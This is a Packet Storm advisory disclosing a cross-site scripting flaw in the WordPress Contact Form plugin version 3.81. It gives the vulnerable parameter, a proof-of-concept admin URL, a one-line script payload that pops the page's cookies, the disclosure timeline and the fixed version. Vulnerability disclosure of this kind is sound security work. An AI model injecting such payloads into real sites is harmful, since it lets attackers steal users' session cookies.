WordPress Contact Form 3.81 Cross Site Scripting

2015-12-17T00:00:00
ID PACKETSTORM:134886
Type packetstorm
Reporter Madhu Akula
Modified 2015-12-17T00:00:00

Description

                                        
                                            `Plugin Details  
  
Plugin Name : Contact Form  
  
Effected Version : 3.81 (and most probably lower version's if any)  
  
Vulnerability : A3-Cross-Site Scripting (XSS)  
  
Identified by : Madhu Akula  
  
  
  
Technical Details  
  
Minimum Level of Access Required : Unauthenticated  
  
PoC - (Proof of Concept) :  
  
http://localhost/wp-admin/admin.php?page=contactform.php&action=go_pro  
  
In the serial key place the below payload  
  
"><script>alert(document.cookie)</script>  
  
Vulnerable Parameter : bws_license_key  
  
  
Video Demonstration :  
  
http://www.youtube.com/watch?v=4yHZvPs8FTE  
  
Type of XSS : Reflected / Stored  
  
Fixed in : 3.8.2  
  
http://wordpress.org/plugins/contact-form-plugin/changelog/  
  
Disclosure Timeline  
  
Vendor Contacted : 2014-08-04  
  
Plugin Status : Updated on 2014-08-07  
  
Public Disclosure : October 3, 2015  
  
CVE Number : Not assigned yet  
  
Plugin Description :  
  
The Contact Form plugin allows you to implement a feedback form to a web-page or a post in no time. It is an extremely easy form, that doesn’t require any additional settings, though there are some available options. All you need is just to activate the plugin and insert the shortcode [bestwebsoft_contact_form] into the text. There is also a premium version of the plugin with more useful features available.  
`